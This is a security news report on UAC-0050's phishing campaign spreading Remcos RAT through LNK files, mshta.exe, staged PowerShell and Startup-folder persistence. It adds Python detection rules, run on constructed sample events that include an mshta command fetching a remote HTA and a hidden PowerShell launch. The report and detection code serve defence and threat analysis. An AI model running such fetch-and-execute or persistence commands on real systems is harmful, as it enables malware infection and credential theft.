    UAC-0050 Group uses new phishing tactics to distribute Remcos RAT

Report, January 4, 2024, Editorial Department, Software Security/Malware

    A threat actor named UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new tactics to evade detection by security software.

“The group’s weapon of choice is Remcos RAT, a notorious remote surveillance and control malware that has long been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a report on Wednesday.

    “However, in the latest operational changes, the UAC-0050 group has integrated a pipeline approach for inter-process communication, demonstrating its advanced adaptability.”

    UAC-0050 has been active since 2020 and has historically targeted entities in Ukraine and Poland through social engineering campaigns, impersonating legitimate organizations to trick recipients into opening malicious attachments.

In February 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) attributed to the group a phishing campaign designed to spread the Remcos RAT.

    The same Trojan has been distributed as part of at least three different phishing waves over the past few months, with one such attack also resulting in the deployment of an information-stealing program called Meduza Stealer.

Uptycs’ analysis is based on LNK files it discovered on December 21, 2023. While the exact initial access vector is not yet known, it is suspected to involve phishing emails targeting Ukrainian military personnel, purportedly concerning advisory roles within the Israel Defense Forces (IDF).

The associated LNK file collects information about the antivirus products installed on the target computer and then uses mshta.exe (a native Windows binary used to run HTML Application, or HTA, files) to retrieve and execute a file named “6.hta” from a remote server.

This step paves the way for a PowerShell script that unpacks another PowerShell script, which in turn downloads two files named “word_update.exe” and “ofer.docx” from the domain new-tech-savvy[.]com.

Executing word_update.exe causes it to create a copy of itself named fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.

This binary also uses unnamed pipes to exchange data between itself and a newly spawned cmd.exe child process in order to eventually decrypt and launch the Remcos RAT (version 4.9.2 Pro), which can harvest system data as well as cookies and login information from web browsers such as Internet Explorer, Mozilla Firefox and Google Chrome.
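The chain above (LNK, then mshta.exe fetching a remote HTA, then PowerShell, then a dropped binary persisting through a Startup-folder shortcut) leaves a recognisable trail in process-creation and file-creation telemetry. The following is an added example, not code from the Uptycs report, showing three Sysmon-style detection rules run over constructed events; the event field names follow Sysmon conventions (EventID 1 = process create, EventID 11 = file create), and the user name, paths and URL are made up for the sample.

```python
import re

# Constructed Sysmon-style events mirroring the reported chain (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/6.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -File stage2.ps1"},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\word_update.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\fmTask_dbg.lnk"},
    # Benign control event: should trigger nothing.
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

# mshta.exe pulling an .hta over HTTP(S), as in the 6.hta retrieval step.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
# Any file written into a user's Startup folder (shortcut-based persistence).
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)


def classify(event):
    """Return the names of the rules this single event triggers."""
    hits = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    if event.get("EventID") == 1:
        if image.endswith("\\mshta.exe") and REMOTE_HTA.search(cmdline):
            hits.append("mshta_remote_hta")
        if image.endswith("\\powershell.exe") and parent.endswith("\\mshta.exe"):
            hits.append("powershell_from_mshta")
    elif event.get("EventID") == 11:
        if STARTUP_DIR.search(event.get("TargetFilename", "")):
            hits.append("startup_folder_drop")
    return hits


def scan(events):
    """Return (image, rules) for every event that triggers at least one rule."""
    results = []
    for event in events:
        rules = classify(event)
        if rules:
            results.append((event["Image"], rules))
    return results


if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

Each rule alone is noisy in some environments; correlating all three on one host within a short window is what makes the pattern worth alerting on.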

    “Utilizing pipes within the Windows operating system provides a covert channel for data transmission, cleverly evading detection by endpoint detection and response (EDR) and anti-virus systems,” the researchers said.

    “While not entirely new, this technology marks a significant leap in the organization’s strategic sophistication.”
